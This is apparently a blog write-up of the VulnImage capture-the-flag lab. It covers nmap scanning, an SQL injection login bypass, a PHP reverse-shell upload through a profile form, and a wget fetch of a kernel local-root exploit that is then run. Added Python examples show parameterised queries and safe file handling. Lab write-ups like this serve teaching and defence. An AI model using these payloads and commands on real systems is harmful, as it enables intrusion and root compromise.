Monday 1 February 2016

VulnImage challenge

Hello,

Looking for our target:
root@osboxes:~# nmap -sn 192.168.1.0/24
OK, from scanning our subnet we know that our target has the IP 192.168.1.103.
What kind of services are running on our target?
root@osboxes:~# nmap -sV -A 192.168.1.103

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 15:32 GMT
Nmap scan report for 192.168.1.103
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 5.1p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 8c:77:73:be:0d:a8:d5:7f:d8:b7:27:30:ed:52:85:23 (DSA)
|_  2048 8b:df:2d:cd:cb:d1:5e:a8:8e:70:93:2d:a6:5f:f1:3c (RSA)
25/tcp   open  smtp        Exim smtpd 4.50
| smtp-commands: localhost.localdomain Hello nmap.scanme.org [192.168.1.104], SIZE 52428800, PIPELINING, HELP,
|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
80/tcp   open  http        Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-24+lenny4

| mysql-info:
|   Protocol: 53
|   Version: .0.51a-24+lenny4
|   Thread ID: 33
|   Capabilities flags: 41516
|   Some Capabilities: Support41Auth, SupportsCompression, SupportsTransactions, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: PR//?/jL{G0XLS<sProU
7777/tcp open  cbt?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port7777-TCP:V=6.47%I=7%D=2/1%Time=56AF7AA0%P=i686-pc-linux-gnu%r(NULL,
SF:D,"HELO\nCOMMAND:")%r(X11Probe,14,"HELO\nCOMMAND:RECV:\x20l")%r(Socks5,
SF:15,"HELO\nCOMMAND:RECV:\x20\x05\x04")%r(Arucer,3E,"HELO\nCOMMAND:RECV:\
SF:x20\xc2\xe5\xe5\xe5\x9e\xa0\xd7\xa4\xa6\xd0\xd5\xdd\xdc\xc8\xd6\xdd\xd7
SF:\xd5\xc8\xd1\xd6\x83\x80\xc8\xdd\xa4\xd1\xa1\xc8\xa4\xd2\xd5\xd7\xdd\xa
SF:3\xa4\xa1\xdd\xa6\xd7\xdd\x98\xe5")%r(GenericLines,17,"HELO\nCOMMAND:RE
SF:CV:\x20\r\n\r\n")%r(GetRequest,25,"HELO\nCOMMAND:RECV:\x20GET\x20/\x20H
SF:TTP/1\.0\r\n\r\n")%r(HTTPOptions,29,"HELO\nCOMMAND:RECV:\x20OPTIONS\x20
SF:/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,29,"HELO\nCOMMAND:RECV:\x20OPTIO
SF:NS\x20/\x20RTSP/1\.0\r\n\r\n")%r(RPCCheck,14,"HELO\nCOMMAND:RECV:\x20\x
SF:80")%r(DNSVersionBindReq,13,"HELO\nCOMMAND:RECV:\x20")%r(DNSStatusReque
SF:st,13,"HELO\nCOMMAND:RECV:\x20")%r(Help,19,"HELO\nCOMMAND:RECV:\x20HELP
SF:\r\n")%r(SSLSessionReq,15,"HELO\nCOMMAND:RECV:\x20\x16\x03")%r(Kerberos
SF:,13,"HELO\nCOMMAND:RECV:\x20")%r(SMBProgNeg,13,"HELO\nCOMMAND:RECV:\x20
SF:")%r(FourOhFourRequest,48,"HELO\nCOMMAND:RECV:\x20GET\x20/nice%20ports%
SF:2C/Tri%6Eity\.txt%2ebak\x20HTTP/1\.0\r\n\r\n")%r(LPDString,1C,"HELO\nCO
SF:MMAND:RECV:\x20\x01default\n")%r(LDAPBindReq,1E,"HELO\nCOMMAND:RECV:\x2
SF:00\x0c\x02\x01\x01`\x07\x02\x01\x02\x04")%r(SIPOptions,D,"HELO\nCOMMAND
SF::")%r(LANDesk-RC,18,"HELO\nCOMMAND:RECV:\x20TNMP\x04")%r(TerminalServer
SF:,14,"HELO\nCOMMAND:RECV:\x20\x03")%r(NCP,17,"HELO\nCOMMAND:RECV:\x20Dmd
SF:T")%r(NotesRPC,14,"HELO\nCOMMAND:RECV:\x20:")%r(WMSRequest,14,"HELO\nCO
SF:MMAND:RECV:\x20\x01")%r(oracle-tns,13,"HELO\nCOMMAND:RECV:\x20")%r(afp,
SF:13,"HELO\nCOMMAND:RECV:\x20")%r(kumo-server,14,"HELO\nCOMMAND:RECV:\x20
SF:\x94");
MAC Address: 00:0C:29:47:61:1C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.5 - 2.6.12
Network Distance: 1 hop
Service Info: Host: localhost.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: DEBIAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
Excellent, we have got a lot of interesting information. As always, let's open the web application in a browser.

Nothing special :-) But below all the posts there is also a link, Post new entry! Hmmm, OK, before running dirbuster, let's examine that link.

I examined this web-based form in the following way:

Username: admin
Password: admin' OR 1=1 -- -
Title: test
Content: <?php echo "test"; ?>
But unfortunately my post was validated and the <?php part was removed from the content of my post. At least we know that the Password field is vulnerable to SQL injection.
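To make clear why the "admin' OR 1=1 -- -" input above authenticates, here is an added example (not the VulnImage application's code, which is PHP and was not available to me) of the same login check written two ways in Python against an in-memory SQLite table with constructed users: a string-built query, which treats the quote and the comment marker as SQL, and a parameterised query, which compares the same text as data.

```python
# Added example, not from the VulnImage challenge or the original post: a minimal
# login check built two ways, to show why the "admin' OR 1=1 -- -" payload from
# the write-up authenticates against string-concatenated SQL and fails against a
# parameterised query. Uses an in-memory SQLite database with constructed data.
import sqlite3

# Constructed sample users; the real VulnImage schema is not known here.
USERS = [("admin", "s3cret-admin-pw"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database holding the constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: attacker-controlled text becomes SQL syntax.

    With password = "admin' OR 1=1 -- -" the WHERE clause becomes
        username = 'admin' AND password = 'admin' OR 1=1 -- -'
    so the trailing quote is commented out and OR 1=1 matches every row.
    """
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    (count,) = conn.execute(sql).fetchone()
    return count > 0


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the same text is compared as a value, never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    (count,) = conn.execute(sql, (username, password)).fetchone()
    return count > 0


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR 1=1 -- -"
    print("vulnerable   :", login_vulnerable(db, "admin", payload))      # True
    print("parameterised:", login_parameterised(db, "admin", payload))   # False
```

The fix is not to strip or escape the quote character but to stop building SQL from user text at all; in the PHP of this era that means mysqli or PDO prepared statements rather than string concatenation into mysql_query().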
OK, what else can we do? Hmmm, "Change profile settings" looks very interesting :-)

Let's try the same technique... OK, I have got the following response:
  Authenticated.Your signature has successfully been entered updated.
Good, but I don't know where the signature is stored. Maybe Burp Suite will be useful in our case. In the meantime, let's run dirbuster.

We can see that our script is not validated by the web application (it is only encoded) and that it is inserted into the sig.txt file.

Dirbuster result:

The repo directory may be helpful for us, as may the profiles and admin directories.
OK, now I am looking for my sig.txt file...
Great! I have found our script in profiles directory!

So, let's submit the web-based form again, but this time we change the file name from sig.txt to shell.php, copy the content of /usr/share/webshells/php/php-reverse-shell.php, edit $port and $ip, and paste it into the form.
Excellent, now we have to find /profiles/admin-shell.php and execute it.
Result:

We have got a limited shell :-)
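The root cause of the step above is that the profile form lets the client pick the file name and extension, and the resulting file lands under the web-served profiles directory. Here is an added example (not the VulnImage application's code, and written in Python rather than the app's PHP) of how a signature-save handler can close both holes: the file name is derived on the server from the session user, the extension is fixed, the content is stored as escaped text, and the storage directory (assumed, chosen under the system temp dir here) lies outside the document root. Any client-supplied "filename" field is simply ignored.

```python
# Added example, not the VulnImage application's code: a signature-save routine
# written the way the profile page should have been, so the client cannot choose
# the file name or extension and the file never lands in a web-served directory.
# SIGNATURE_DIR, the username rule and the size limit are assumptions.
import html
import os
import re
import tempfile

# Assumed storage root, outside the document root: nothing here is served or
# executed by the web server, whatever the bytes inside the file look like.
SIGNATURE_DIR = os.path.join(tempfile.gettempdir(), "example-signatures")
USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")
MAX_SIGNATURE_BYTES = 1024


class SignatureError(ValueError):
    """Raised for any input the handler refuses to act on."""


def signature_path(username: str) -> str:
    """Derive the storage path from the server-side identity only.

    The client supplies no file name, so a sig.txt -> shell.php rename is not
    expressible; the username pattern also rules out '/' and '..'.
    """
    if not USERNAME_RE.fullmatch(username):
        raise SignatureError("invalid username")
    path = os.path.join(SIGNATURE_DIR, f"{username}.sig")
    # Defence in depth: the resolved path must still sit inside SIGNATURE_DIR.
    root = os.path.realpath(SIGNATURE_DIR)
    if os.path.commonpath([root, os.path.realpath(path)]) != root:
        raise SignatureError("path escapes signature directory")
    return path


def save_signature(username: str, signature: str) -> str:
    """Store the signature as HTML-escaped text under a server-chosen name."""
    data = html.escape(signature, quote=True)
    if len(data.encode("utf-8")) > MAX_SIGNATURE_BYTES:
        raise SignatureError("signature too long")
    os.makedirs(SIGNATURE_DIR, mode=0o700, exist_ok=True)
    path = signature_path(username)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(data)
    return path


def load_signature(username: str) -> str:
    """Read back the stored (already escaped) signature for display."""
    with open(signature_path(username), encoding="utf-8") as fh:
        return fh.read()


def handle_profile_update(session_user: str, form: dict) -> str:
    """Mimic the profile form handler: only the 'signature' field is honoured;
    a client-supplied 'filename' field (as in the write-up) is ignored."""
    return save_signature(session_user, form.get("signature", ""))


if __name__ == "__main__":
    # Constructed request resembling the one in the write-up.
    stored = handle_profile_update(
        "admin", {"filename": "shell.php", "signature": '<?php echo "test"; ?>'})
    print(stored)                     # .../example-signatures/admin.sig
    print(load_signature("admin"))    # &lt;?php echo &quot;test&quot;; ?&gt;
```

Escaping on its own would not have saved the original application: a .php file inside the document root is handed to the PHP engine regardless of how its contents were produced. Taking the name and location away from the client is what removes the execution path; the escaping only protects the page that later displays the signature.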

As always, let's run the usual command:
www-data@debian:/tmp$ uname -a
uname -a
Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
Good, now we have to find appropriate exploit to escalate our privileges :-)
Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)
OK, let's play ball!
www-data@debian:/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
<ve-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz       
--10:00:17--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
           => `9574.tgz'
Resolving github.com... 192.30.252.130
Connecting to github.com[192.30.252.130]:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/9574.tgz [following]
--10:00:18--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/9574.tgz
           => `9574.tgz'
Resolving raw.githubusercontent.com... 185.31.17.133
Connecting to raw.githubusercontent.com[185.31.17.133]:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,359 [application/octet-stream]

100%[====================================>] 4,359         --.--K/s            

10:00:18 (94.48 MB/s) - `9574.tgz' saved [4359/4359]

www-data@debian:/tmp$ ls
ls
9574.tgz
www-data@debian:/tmp$ tar zxvf 9574.tgz
tar zxvf 9574.tgz
therebel/
therebel/exploit.c
therebel/pwnkernel.c
therebel/therebel.sh
www-data@debian:/tmp$ cd therebel
cd therebel
www-data@debian:/tmp/therebel$ ls
ls
exploit.c  pwnkernel.c    therebel.sh
www-data@debian:/tmp/therebel$ bash therebel.sh
And BOOM!!

Game Over!